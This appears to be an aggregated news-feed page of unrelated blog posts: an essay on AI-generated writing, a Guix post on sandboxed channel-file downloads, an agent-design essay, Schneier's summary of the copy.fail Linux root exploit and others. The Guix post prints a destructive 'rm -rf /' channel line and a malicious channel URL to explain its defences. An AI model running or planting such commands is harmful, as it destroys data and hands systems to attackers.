In 2023, we were already seeing book bans and “Don’t Say Gay” laws. I didn’t know if that trend was going to continue for three years, either. I hoped it wouldn’t. But I couldn’t help but look at that news and think of my own childhood. I eventually did find words and concepts for what I was experiencing, although not necessarily in the healthiest way. The generation after me was given so much more, in terms of words and ways of understanding themselves. It galled me to see reactionaries trying to take that away from them again.

When I put these two urgently emerging problems together, I could see that they had one big thing in common. They were both, at heart, about the deep human need to express one’s own feelings – and a powerful movement that threatened to take it away.

AI writing is not an expression of the genuine heartfelt thought or experience of a human. If it is carefully prompted to express a human’s heartfelt thought, then the thought comes from the human, not the AI. Research shows that, the longer we use a generative AI, the less our own thoughts enter into it; instead, offloading our thinking onto an AI causes our own capacity for independent thought to atrophy. Given the fervor and urgency with which tech companies urge us to use AI for everything, one might be forgiven for suspecting that this atrophy is their goal.

Moreover, because it’s trained to predict the most likely continuation of a set of words, AI writing will always converge toward the most mainstream or most common way of looking at something. The mainstream of the training data – essentially, the whole Internet, plus all the published books that the tech companies could find – is not queer. Even without any deliberate censorship, the perspectives of queer people and other minoritized groups are less likely to be considered in an AI’s output. For the same reason, if the AI is deliberately prompted to represent a queer perspective, it will rely on broad averages and stereotypes – not the lived and felt experience of an individual human who is queer.

But in hard times like these, independent thought based on our own lived experience is exactly what we need. This is the skill that helps us to understand when something is not quite right, or doesn’t quite match the truth of our lives – whether it’s a structural injustice or something personal.

Ignore All Previous Instructions tells the story of characters who grow up caught in a system where their own thoughts and voices are not valued, and who find ways – determinedly and imperfectly – to tell their own stories regardless. If there’s one idea readers take away from the book, I hope it’s the beauty and power of storytelling in our own words – and the need to hold on to it in the face of an establishment which would rather our stories weren’t told.


Ignore All Previous Instructions: Amazon|Barnes & Noble|Bookshop

Author socials: Website|Bluesky

Read an excerpt.

16:49

16:00

Link [Scripting News]

Masto, Twitter: I'd like to come up with a list of formats, protocols and products that have become defaults for AI work.

14:35

Time travel without borders [Planet GNU]

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure� evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

  • they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
  • or, they are the channels currently in use, as returned by guix describe.

This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channel� rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

[$] Scaling transparent huge pages to 1GB [LWN.net]

As a general rule, when developers talk about huge pages, they are referring to PMD-level pages that are 1MB or 2MB in size, depending on the CPU architecture. Most CPUs can support other huge-page sizes, though. On x86 systems, PUD-level huge pages hold 1GB of data. Providing such large pages transparently to processes has generally not been considered as either feasible or desirable, but Usama Arif is trying to change that assessment. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, he led a session in the memory-management track on how to make transparent huge pages (THPs) truly huge.

Security updates for Tuesday [LWN.net]

Security updates have been issued by AlmaLinux (freerdp, glib2, libsoup3, and openexr), Debian (dnsmasq, p7zip, p7zip-rar, python-authlib, and rails), Fedora (chromium, firefox, httpd, and nss), SUSE (java-25-openj9, krb5, libmodsecurity3, and mcphost), and Ubuntu (imagemagick, linux, linux-aws, linux-aws-fips, linux-aws-hwe, linux-azure-4.15, linux-fips, linux-gcp, linux-gcp-4.15, linux-gcp-fips, linux-hwe, linux-kvm, linux-oracle, linux-azure, linux-azure-fips, linux-oracle, linux-azure-5.15, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, and linux-raspi).

14:28

Link [Scripting News]

Yesterday I learned about JSONL, and was of course intrigued. It's a really simple thing, even simpler than RSS, and does basically the same thing. And even better, it's the way the AI industry hooks streams together. So If we can get RSS to serve as a source of JSONL feeds, it's possible that the AI industry will find it useful. My goal is to get every standard of the web hooked up to AI, quickly, before the silos realize they're leaving out something important. Once they figure it out, they'll have no choice but to add real RSS support. So I put together a quick demo app that hooks into FeedLand and posts to a JSONL feed new items from one of a small set of feeds I chose basically at random. And here is the JSONL feed. If you're a developer in AI-land could you try reading this into your JSONL-ingesting app, and let me know if I got it right. Here's a place to comment. BTW, that URL is temporary just for this quick demo.

Link [Scripting News]

Good morning sports fans!

1343: Gotta Bounce [Order of the Stick]

http://www.giantitp.com/comics/oots1343.html

13:49

Representative Line: Underscore Its Unimportance [The Daily WTF]

Frequent submitter Argle (previously), sends us a short little representative line. The good news is that this line of code came across Argle's screen during a code review: it was being removed. The bad news is that it was sitting in the code base for ages.

_ = len / 8.0f;

Argle writes:

In a code review today. A co-worker wisely removed the line. Dunno the logic that made anyone write it in the first place.

This is C#, though it could be basically any language. Using _ is one of those little conventions that we use to tell the linter to ignore the fact that this variable isn't used. And this variable was not being used. Of course, in addition to being unused, it's also a puzzle: where does the 8.0f come from? No one knows. Why would we even want the length divided by eight? No one knows. There's nothing about this code that gives any indication that it was a meaningful operation at any point.

No one knows what it does, or why it was there in the first place, but someone put the time into making sure the linter didn't complain about its uselessness by using _ as the variable.

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

12:56

Gyms for Them, Mirrors for Us [Radar]

Personal AI doesn’t have to run your life to change it. It just must see you clearly and feed your behavior back to you in a way you can’t dodge. Once you look at AI as feedback loops instead of little butlers, the whole “agent” conversation starts to feel upside down.

We’ve overrotated on agents that act and massively underinvested in systems that watch, interpret, and train, for humans and for models.

Stop shipping little butlers

Most personal AI demos orbit the same fantasy: inbox‑zero sidekicks, calendar‑tuning bots, or agents that “just handle it” so you can “focus on what matters.” They’re great on stage but terrible as a risk posture.

The butler model hides a simple asymmetry. A read‑only system that misinterprets you is mildly annoying; you ignore a bad suggestion. A write‑enabled system that misfires in your inbox or CRM is career-limiting. One error is a shrug, the other is an incident report.

That’s the asymmetric agent in one line: Read is cheap; write is expensive. Read can be broad, but write should be narrow, rare, and very hard‑earned. The first, highest‑leverage thing you can build is a mirror: an AI that reads your digital exhaust, synthesizes what it sees, and reflects it back, without ever touching the systems that move money, time, or relationships. Šimon Podhajský’s talk, “Cognitive Exhaust Fumes, or: Read‑Only AI Is Underrated,” is a great example of this pattern in the wild.

This isn’t a temporary sandbox before “real agents.” Treating read‑only as a stepping stone and write as the prize is how you hand a chainsaw to a toddler because they’ve proven they can hold a spoon.

Cognitive exhaust is the real dataset

Your day produces a ridiculous amount of cognitive exhaust: emails half‑written, tabs abandoned, tasks snoozed, articles skimmed, and notes forgotten. Any one stream is noisy. The value appears when you correlate across all of them.

A serious personal AI can sit over multiple sources—mail, calendar, notes, browser history, docs, and CRM—and build a cross‑cutting view of what you do versus what you say you care about. You want it a bit judgmental. You want it to surface things like:

  • Intention–action gaps: projects you “prioritize” but never touch
  • Attention drift: where your time really went
  • Relationship decay: people you insist are key but haven’t contacted in months

Podhajský’s system does exactly this, using a read‑only agent that writes only into its own Obsidian vault—no edits to the original systems, no auto‑emails, just brutally honest reflections and suggested experiments.

Here’s the trap: Your agent must only observe. The moment an agent writes back into the systems it’s monitoring, you’ve poisoned the well. You’re not observing your behavior anymore; you’re observing an AI‑amplified feedback loop. You’ve built an observability rig that forges its own logs. The data stops being “you” and becomes “you plus a stochastic autocomplete with opinions.”

For personal AI, that’s existential. If the whole point is to help you see yourself more clearly, having the same system both author and interpret the traces destroys the value proposition. The mirror starts painting your reflection.

Feedback loops, not party tricks

Seen as feedback loops, the symmetry becomes obvious.

A mirror is a loop targeting your nervous system. The “model” being updated is the human. The exhaust is your digital activity. The environment is your toolchain. The reward shows up as shame, insight, or resolve when you see your week laid bare.

A gym is a loop targeting model weights. The model acts in a world, receives rewards or penalties, and updates its policy. The exhaust is trajectories of prompts, actions, outcomes. The environment is a task harness. The reward is a verifiable signal.

Two different learners, same structure:

  • In the mirror, the user is the learner and the agent is a silent observer.
  • In the gym, the model is the learner and the environment is the judge.

Both are broken for the same reason: We obsess over agents doing flashy things and neglect the quality of the signal that trains the system—human or model. We ship chatty butlers and call it “intelligence” instead of asking, “How clean is the feedback?”

Environments are the new unit of deployment

On the model side, we’re still trying to prompt‑engineer our way into reliability. That’s cute for prototypes but reckless for systems you depend on.

We spent 20 years perfecting CI/CD for deterministic code—version control, reproducible builds, test harnesses, staging, blue‑green deploys—all so we could ship well informed. Meanwhile, we vibe‑check stochastic agents into production with a handful of prompts and a cherry‑picked demo.

A more sensible default is to treat the environment definition—the code and configuration that specify the world the model lives in—as the unit of deployment. Libraries like Verifiers make this concrete by packaging environments for LLMs with tools, datasets, parsing logic, rewards, and rollout policies in one place.

To make that definition precise, you need four anchors:

  • State schema: The shape of the world the environment exposes to the model at each step (fields, types, invariants)
  • Action interface: The tools or functions the model is allowed to call, with their inputs and outputs
  • Reward spec: The checks you run to score behavior (correct/incorrect, passed/failed, right tool, right schema)
  • Rollout policy: How you exercise the environment (single‑turn versus multi‑turn, maximum steps, termination conditions)

You’re not “deploying state” in the sense of a frozen snapshot of production. You’re deploying the rules of the game: what the model can see, what it can do, how you score it, and how you run episodes. Any candidate model you plug into that environment is evaluated and constrained the same way. You then treat that environment definition like a test suite plus staging cluster, comparing models on behavior that  matters for your workflow, training smaller, specialized models using verifiable rewards instead of vibes, and detecting regressions when either models or tools change.

For enterprises, this means you don’t “deploy an LLM” with some prompts. You ship an environment package: code, config, and test data that define the world; plus metrics and logging. The model is a plug‑in you can swap or retrain based on how it behaves inside that package, not in an ad hoc prompt sandbox.

Observers, gyms, and asymmetric agents

Mirrors and gyms are both environments built around feedback loops. The difference is who’s allowed to touch reality.

  • Mirrors watch you. The AI reads broadly, writes only to its own notes, and hands you structured feedback. You learn; you act.
  • Gyms watch the model. The AI acts inside a sandbox, collects rewards, updates its weights. The model learns; the environment constrains.

Agents—the things that take actions in live systems—should sit downstream of both. They should be asymmetric by design:

  • In production, agents default to read‑only or read‑mostly. Write access is narrow, logged, reviewable, and easy to kill.
  • In training and evaluation, agents can be fully read‑write but only inside deliberately engineered environments.

Anything else is YOLO alignment: You train in production, corrupt your own telemetry, and then argue with the logs when something goes wrong.

Think of it as risk management for agents. Every new write permission expands the blast radius. If you haven’t instrumented the read path, you’re taking on unpriced risk. Gyms for them, mirrors for us, asymmetric agents at the edges—that’s a risk posture you can explain to an auditor.

Butler agents are security theater

Now add security to the mix. Simon Willison’s “lethal trifecta” of agent risk is simple: private data, untrusted inputs, and external communications. Get all three in one agent and you’ve basically handed an attacker a loaded gun.

Most “do‑everything” butler agents proudly hit the trifecta: They ingest piles of sensitive internal data, they cheerfully process whatever the internet throws at them, and they’re allowed to send emails, modify records, or call external APIs. You’ve built a hyper‑efficient exfiltration and amplification engine.

Observer AI pulls in the opposite direction. It can still see private data but uses it only to generate internal reflections or drafts. It treats untrusted inputs as something to analyze, not something to obey. And it doesn’t touch external channels; you stay in the loop.

Butler agents give executives the feeling that “AI is doing work for us” while dramatically increasing the blast radius of prompt injection, model hallucinations, or compromised keys. Observers are actual governance: They help humans see, reason, and decide before anything gets written where it counts.

In the enterprise, “agentic workflows” without observer environments are just shadow IT with better branding. If you can’t instrument and audit what the system reads, you have no business trusting what it writes.

Boots on the ground: The friction is real

This isn’t just a whiteboard problem. In big bank reality, the conversation often goes like this:

Client: “We want an AI assistant that updates customer records, sends follow‑ups, and opens tickets automatically.”

Me: “Great. Show me your observability. How do you know what it’s reading today and how those reads map to actions?”

 Client: “…we have logs?”

Say, “No, your shiny new bot should not have direct write access to the CRM,” and the first reaction is disbelief. Then come the workarounds: “What if it drafts and auto‑sends unless someone clicks reject?” “What if it only updates ‘safe’ fields?” “What if the human is technically in the loop but the default is accept?” All of them duck the hard work of building the mirror and the gym first.

In a post‑GDPR, postbreach world, an observer that doesn’t push data is a compliance gift. A write‑enabled agent is a data‑deletion nightmare and a discovery headache. We’re desperate to give agents hands before we’ve given ourselves eyes. Until you can trace the read path—what’s accessed, why, and with what downstream effect—every new write permission is architectural debt with a ticking clock.

A simple playbook

If you’re trying to bring order to this chaos, here’s a blunt playbook.

Build observers first
Aggregate your cognitive exhaust—or the org’s. Start with a read‑only layer across mail, tickets, docs, code, CRM, usage logs. Have it produce structured reflections: where work happens, where intent and action diverge, and where relationships or processes are decaying. Let it write only into its own vault.

Encode scary workflows as environments
Pick high‑risk, high‑value flows: claims adjudication, payment routing, change approval, remediation—anything with money, legal exposure, or brand risk. For each, define an environment with clear state schema, action interface, reward spec, and rollout policy. Use frameworks like Verifiers to make these reusable instead of bespoke scripts.

Treat environments as deployable artifacts
Think of an environment as a repo you can clone—not a frozen copy of production but the minimum code, configuration, and sample data needed to exercise a workflow reproducibly. You version, test, and promote that environment package the way you do services. When APIs, schemas, or policies change, you update the package and rerun the suites. You don’t “prompt harder” in production and hope.

Only then, grant narrow write access
Once mirrors and gyms are in place, start handing out tightly scoped write capabilities—one surface at a time, with metrics and rollback. And have your observers watching both human and agent behavior for drift. This is slower. It’s also professional.

Rethinking “personal” and “agentic”

Reframing AI around feedback loops does odd things to our buzzwords. “Personal AI” stops being “a bot that talks like you and acts for you” and becomes “an observability layer on your own cognition.” It’s closer to therapy than outsourcing. Therapy doesn’t send emails for you; it changes how you write them.

“Agentic AI” stops being “a thing that chains tools together” and becomes “a thing that lives inside an environment with explicit constraints and signed‑off rewards.” The swagger moves from the model to the environment. The question shifts from “How smart is your agent?” to “How well‑designed is the world you’re letting it inhabit?”

Gyms for them, mirrors for us. Agents only where the feedback loops are strong enough to justify the risk. Less demo‑friendly than a bot that spams your calendar, sure. But a lot closer to something you can live with—in your personal life, and in a production architecture that must survive contact with reality.

12:14

Copy.Fail Linux Vulnerability [Schneier on Security]

This is the worst Linux vulnerability in years.

TL;DR

  • copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC.
  • It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own.
  • The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets.
  • The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing.
  • Kubernetes Pod Security Standards (Restricted) and the default RuntimeDefault seccomp profile do not block the syscall used. A custom seccomp profile is needed.
  • The mainline fix landed on 1 April. Distros are rolling kernels out now. Patch.

“Local privilege escalation” sounds dry, so let me unpack it. It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.

Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.

News article.

11:28

The Law of Unintended Consequences [Judith Proctor's Journal]

Those who  love 'The Good Place' as much as I do will probably recognise the quote.

'The Law of Unintended Consequences' says that it's not possible to live a perfect life in modern society.  Everything we do impacts negatively on the environment or involves low-paid labour, unethical working practices, etc.

But there are some things we can do.

We can't win, but we can nibble at the edges.

Shampoo

Advertisers work hard to convince us that we need to wash our hair ever single day to keep it perfect, but our ancestors didn't have shampoo.  Shampoo didn't reach the UK until the eighteenth century.

I used to suffer from regular problems with my ears.  I thought it was earwax build up, until the lady syringing my ears said it was thin slivers of skin.

I wondered what was triggering it, and considered that shampoo might be a possible cause.

 

Taking a deep breath, I began cutting out shampoo at a week long folk festival - where so many people were camping that no one would notice if I was looking a mess.

My hair got greasy, but not as badly as I'd expected.  I carried on with the experiment...

After two months of not stripping all the natural oils in my hair and scalp, my body stopped over-producing them in an effort to replace them.

Over 30 years later, I still haven't gone back to using shampoo, and my hair isn't greasy.  I wash it with water, and that's all.  Brushing distributes the oils evenly and keeps it silky, but not greasy.

Another member of my family who went the same way, briefly tried shampoo recently, and promptly got dandruff (which they'd never had before).

Not saying this will work for everyone, but you can save a LOT of money, and reduce your environmental impact as well. (detergent kills fish).   If you do go for it, cut down gradually.  Reduce the amount of shampoo you use, and reduced the frequency of washes.  If you cut down gradually, then you'll avoid the greasy phase.  Maybe use some sort of tiny measuring cup to measure the amount you use?

 

 



comment count unavailable comments

10:28

Early rejections [Seth's Blog]

Long after the fact, these are the best kind. They remind us of how far we’ve come. They’re proof that not giving up was a good idea. They are fuel for the next thing.

But, at the time, they’re pretty hard to live with.

All we can do is remind ourselves that it’s an unskippable part of a useful journey.

08:28

Pluralistic: A fascist paradigm (12 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



A king on a sumptuous, much elaborated throne; in one hand he holds a sceptre of office, in the other, the leashes for two fierce stone dogs that guard the throne. The king's head has been replaced with a character who was used as the basis for MAD Magazine's Alfred E Neumann. The new head sports a conical dunce cap. Behind the king is a UK Reform Party rosette. The background is an Egyptian temple, ganked from a Dore Old Testament engraving. The floor has been carpeted in sumptuous tabriz from the Ottoman court.

A fascist paradigm (permalink)

Yesterday, I attended a workshop on systems thinking and political change, which included a presentation on the work of Donella Meadows, whose Thinking in Systems is a canonical work on the subject:

https://en.wikipedia.org/wiki/Thinking_In_Systems:_A_Primer

"Systems thinking" is an analytical framework that treats the world as a mesh of interconnected, nonlinear components and relationships that can't be easily understood or steered. A complex system isn't merely "complicated." A mechanical watch is complicated, in that it has many parts that work together in ways that require training and specialized knowledge to understand. But it isn't "complex" because each part has a specific function that can be understood and adjusted.

In a complex system – say, an ecosystem – the parts are meshed in a web of unobvious relationships that make it difficult to predict what effect will follow from a given perturbation. When a blight kills off a plant species, the soil stability declines, resulting in landslides during the rainy season, changing the mineral content of nearby waterways, which creates microbial blooms or fish die-offs in a distant, downstream lake.

A slide showing a lever weighted down on one end by a circle labeled 'System' next to a fulcrum; the points along the lever are labeled with different potential interventions that can move the system, taken from the work of Donella Meadows.

But systems thinking isn't a counsel of despair that insists that you shouldn't do anything because you can never predict what will come of your actions. In Thinking in Systems, Meadows presents a hierarchy of leverage points for changing a system, ranked from least effective ("Constants, numbers, parameters") to most ("The power to shift paradigms to deal with new challenges"):

https://www.flickr.com/photos/doctorow/55264856861/

In all, Meadows theorizes 12 different "places to intervene in a system." The least effective of these – constants like taxes and standards, negative and positive feedback loops – are the sites of most of our political fights, and rightly so. They are the fine-tuning knobs of the system that adjust its margins. Once you have the rule of law ("the rules of the system"), you can drive change by amending, repealing or passing a law:

https://donellameadows.org/archives/leverage-points-places-to-intervene-in-a-system/

But when you're confronted with a system that is significantly, persistently dysfunctional, you will likely have to work at sites that are further up the hierarchy, such as "the distribution of power over the rules of the system" or "the goals of the system"; or the most profound of all, "the paradigm out of which the system — its goals, power structure, rules, its culture — arises."

Thinking about paradigms is a form of "meta-cognition," which is to say, "thinking about how you think." Your paradigm encompasses all your assumptions, including your assumptions about how to proceed from your other assumptions: "if x, then y" is a paradigm.

The workshop where we were discussing all of this is part of a group whose goal is reversing the antidemocratic movement in our society and the climate emergency that is its backdrop. But as I listened to the speaker and the ensuing discussion, it occurred to me that Meadows' theoretical work was a very good way of describing the successes of the fascist movement in the UK and around the world.

Fascists like Farage and Trump are, at their root, anti-democratic. Their pitch is that the people are incapable of self-determination (as Peter Thiel puts it, "democracy is incompatible with freedom"). They want us to think that all our neighbors are irrational and foolish, and that we, too, are irrational and foolish, and that our safety and prosperity can only be safeguarded if we seek out those few people who are born to rule and liberate them from the petty niceties and regulations that democracy and the rule of law demand.

In other words, the paradigm of democracy is that all of us are capable of both wise self-governance and self-rationalized misgovernance, and each of us has a useful perspective to contribute. The fascist paradigm is that we can't be trusted to rule ourselves, and only the people who are born with "good blood" are capable of directing our lives:

https://pluralistic.net/2025/05/20/big-cornflakes-energy/#caliper-pilled

This is the theory behind "race realism" and "human diversity" and all the other polite names the modern fascist uses to obscure the fact that they're reviving eugenics. It explains the panic over DEI, a panic driven by the belief that lesser people are being elevated to positions of rule and authority that they are genetically incapable of carrying out.

That's why, whenever a disaster arises, fascists demand to know the gender, race and sexual orientation of the pilot, the ship's captain, or the official in charge. If the person who crashed the cargo ship into the bridge has brown skin, we can add another line to the ledger of costs associated with the doomed project to put people who were born to be bossed around in the boss's seat (of course, if the pilot turns out to be a white guy, that proves nothing, except that mistakes sometimes happen).

The revival of fascism in this century has been scarily effective, and at times it can feel unstoppable. Meadows' work on systems thinking provides an explanation for that efficacy – and suggests a theory of change for dispatching fascism back to the graveyard of history. Fascists have made changes to things like laws and feedback loops, rules and distribution of power, but this all stems from a more profound alteration to the system, at the level of the paradigm.

Which suggests that the real fight we have is over that paradigm: we have to convince our neighbors that they are smart enough to rule themselves, and so are we, and so is everyone else. We have to convince them that even the smartest and wisest person (including us, including them) is capable of folly and needs to have checks on their (our) authority.

We need to attack the theory of the "unitary executive" and every other autocratic ideology head on. We have to insist that these aren't just unconstitutional, but that they are ideologically catastrophic. "No kings," because even an omnibenevolent king isn't omniscient, and that means that omnipotence is always omnidestructive in the long run.

The fascist revival has been scarily effective and resilient – and systems thinking offers an explanation for both that efficacy and that resiliency.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago First aid for the dying dotcom http://modernhumorist.com/mh/0010/dotcom/

#20yrsago OpenStreetMap maps Isle of Wight, Manchester next https://wiki.openstreetmap.org/wiki/Mapchester_Mapping_Party_2006

#20yrsago Fueling model rockets with Oreo fillings https://web.archive.org/web/20060616192646/https://www.popsci.com/popsci/how20/600152d7d441b010vgnvcm1000004eecbccdrcrd.html

#20yrsago Legal guide for podcasters https://wiki.creativecommons.org/wiki/Welcome_To_The_Podcasting_Legal_Guide

#20yrsago Collection of 1100+ found grocery lists https://grocerylists.org/

#10yrsago Mayor of Jackson, MS: “I believe we can pray potholes away” https://www.wjtv.com/news/jackson-mayor-tony-yarber-we-can-pray-potholes-away/

#10yrsago What’s the best way to distribute numbers on the faces of a D120? https://web.archive.org/web/20160510182023/https://www.wired.com/2016/05/mathematical-challenge-of-designing-the-worlds-most-complex-120-sided-dice/

#10yrsago Billionaire Paypal co-founder Peter Thiel will be a California Trump delegate https://web.archive.org/web/20160510155226/https://www.wired.com/2016/05/investor-peter-thiel-will-california-delegate-trump/

#10yrsago McClatchy newspapers’ CEO pleased to announce that he’s shipping IT jobs overseas https://web.archive.org/web/20160510102956/https://www.computerworld.com/article/3067304/it-careers/newspaper-chain-sending-it-jobs-overseas.html

